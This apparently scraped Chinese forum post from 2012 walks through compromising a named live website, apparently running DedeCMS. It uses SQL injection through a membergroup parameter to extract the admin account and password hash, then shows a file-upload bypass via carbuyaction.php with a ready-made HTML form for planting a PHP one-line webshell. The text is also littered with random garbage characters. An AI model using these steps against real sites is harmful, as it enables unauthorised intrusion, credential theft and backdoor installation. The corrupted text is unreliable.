①注入漏洞。
! W, Y3 |5 d- C h( f这站 http://www.political-security.com/9 h5 B4 ^* i$ A0 Q: R
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,0 l% P6 P8 l; e( x( N' P
www.political-security.com/data/mysql_error_trace.inc 爆后台
; s3 @, l3 {8 k% O: c. Q5 U然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。* `% ~8 m9 p0 F9 Y( V, O* L
然后写上语句 , n4 u! P- k( z# ]: M5 l; J7 r% ^
查看管理员帐号; }" @* k9 r2 O! Y7 d
http://www.political-security.co ... &membergroup=@`% L0 O/ G, h% N( D: z
- u; S q% O, w+ |) Z1 v2 k
admin
9 y% N$ t! T1 q2 Z `! k6 x$ V$ c0 q( ~' s, U5 \+ v% |* {
查看管理员密码1 r/ d, ?1 U/ Y7 r: H9 ?, s
http://www.political-security.co ... &membergroup=@`
8 j9 w0 b+ z; U6 ]1 n# @" J1 J3 O. n, M& h% T" v
8d29b1ef9f8c5a5af429- Z0 ^: p# x; Z7 C
& V0 a9 m) J' P4 w# @# A查看管理员密码
2 X: `; B, S$ {; r5 W( j+ n' r. U7 {3 ?1 q" d: z0 j+ b
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5( W# u, u. K6 c) ~8 b3 i
0 w! j7 N# \4 u+ Z( p, j+ r8d2, {& d0 F6 }% a! J3 m4 Y$ w7 T5 o
9b1ef9f8c5a5af42
8 n0 u+ Z; ] L" ]& ?9: H- i( a8 D9 ^+ `
8 l' N3 r$ b+ O; o) icmd5没解出来 只好测试第二个方法
7 S) c$ Y' t0 E+ j1 [ ~! z0 c! G6 h8 z! T
V1 ^+ V/ a* M. d' V1 g1 |# h9 g
②上传漏洞:( d) ~4 |" j( c
6 L: J( f& Z# S, w3 `7 V- ]7 ^8 j
只要登陆会员中心,然后访问页面链接$ J% ?* F4 \: Z; b, p. b
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
5 G, ~6 `$ S% d9 m/ o( H
: g q+ ?3 ?. @如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”: f$ D3 T. T1 p- x' X# T3 v+ j3 H
& ]9 S- H: ?5 { P1 H( @) I9 M于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm% g3 t* q4 P' x! |; L
z( h }0 i) L! q) E7 j7 }( g
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>4 }2 K" c0 S6 B& |- i
或者. [! i1 I7 @3 ?; D6 J
即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对